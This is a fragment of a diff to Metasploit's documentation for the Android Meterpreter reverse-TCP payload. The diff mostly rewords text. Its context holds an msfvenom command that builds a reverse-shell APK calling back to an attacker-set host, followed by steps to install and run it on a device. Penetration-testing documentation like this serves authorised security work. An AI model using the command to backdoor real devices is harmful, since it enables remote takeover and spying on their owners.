rapid7/metasploit-framework/documentation/modules/payload/android/meterpreter/reverse_tcp.md

 msf payload(reverse_tcp) >
 ```

-And here is how with msfvenom:
+To create the APK with msfvenom:

 ```
 ./msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw -o /tmp/android.apk
 ```

 Next, start an Android device.
 Upload the APK, and execute it.
 There are different ways to do this,
-so please refer to Scenarios for more information.
+so please refer to the Scenarios section for more information.

 ## Important Basic Commands